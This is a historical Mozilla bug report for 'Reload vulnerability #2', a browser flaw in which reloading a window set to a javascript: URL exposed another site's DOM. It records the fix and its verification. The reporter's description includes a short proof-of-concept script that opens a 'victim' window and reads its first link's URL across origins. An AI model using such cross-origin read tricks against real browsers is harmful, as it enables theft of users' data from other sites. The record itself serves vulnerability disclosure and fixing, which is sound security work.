Reload vulnerability #2

VERIFIED FIXED in M14

Status

()

Core
Security
P3
normal
VERIFIED FIXED
18 years ago
11 years ago

People

(Reporter: joro, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows 95
Points:
---
Bug Flags:
in-testsuite ?

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [PDT+] Expected resolution date: 2/11, URL)

(Reporter)

Description

18 years ago
Reloading a page which location is set to a "javascript:" URL may reveal the DOM 
of the page.
The code is:
---------------------------------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com","victim");
function f()
{
 a.location="javascript:try {alert('Here is the first link: 
'+document.links[0].href)} catch(ex) {alert('Reload the Yahoo window')}";
}
setTimeout("f()",8000);
</SCRIPT>
---------------------------------------------------------------------
(Assignee)

Updated

18 years ago
Status: NEW → ASSIGNED
Keywords: beta1
Target Milestone: M14

Comment 1

18 years ago
Putting on PDT+ radar for beta1.
Whiteboard: [PDT+]
(Assignee)

Updated

18 years ago
Group: netscapeconfidential?
(Assignee)

Updated

18 years ago
Whiteboard: [PDT+] → [PDT+] Expected resolution date: 2/11
(Assignee)

Comment 2

18 years ago
Checked in fix
Group: netscapeconfidential?
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED

Comment 3

18 years ago
Verified fixed.
Status: RESOLVED → VERIFIED

Comment 4

18 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General

Updated

12 years ago
Flags: testcase+

Updated

11 years ago
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.